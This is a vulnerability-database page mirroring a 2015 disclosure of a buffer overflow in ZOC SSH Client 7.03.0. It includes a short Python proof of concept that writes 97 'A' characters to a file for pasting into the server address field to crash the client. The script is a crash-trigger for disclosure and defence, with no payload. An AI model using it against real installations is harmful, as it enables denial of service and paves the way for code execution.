Lucene search

K

ZOC SSH Client 7.03.0 Buffer Overflow

๐Ÿ—“๏ธย 20 May 2015ย 00:00:00Reported byย Dolev FarhiTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 17ย Views

ZOC SSH Client v.7.03.0 Buffer Overflow vulnerabilit

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`# Exploit title: ZOC SSH Client v.7.03.0 Buffer overflow vulnerability (SEH)  
# Date: 20-5-2015  
# Vendor homepage: www.emtec.com  
# Software Link: http://www.emtec.com/cgi-local/download.cgi?what=ZOC7%20(Windows)&link=zoc/zoc7030.exe&ext=html  
# Author: Dolev Farhi  
  
# Details:  
# --------  
# Create a new connection, run the py script and copy the AAAA...string from zoc.txt to clipboard. paste it in the  
# server address and attempt to connect.  
"""  
  
#!/usr/bin/python  
filename="zoc.txt"  
buffer = "\x41" * 97  
textfile = open(filename , 'w')  
textfile.write(buffer)  
textfile.close()  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
20 May 2015 00:00Current
0.4Low risk
Vulners AI Score0.4
17
.json
Report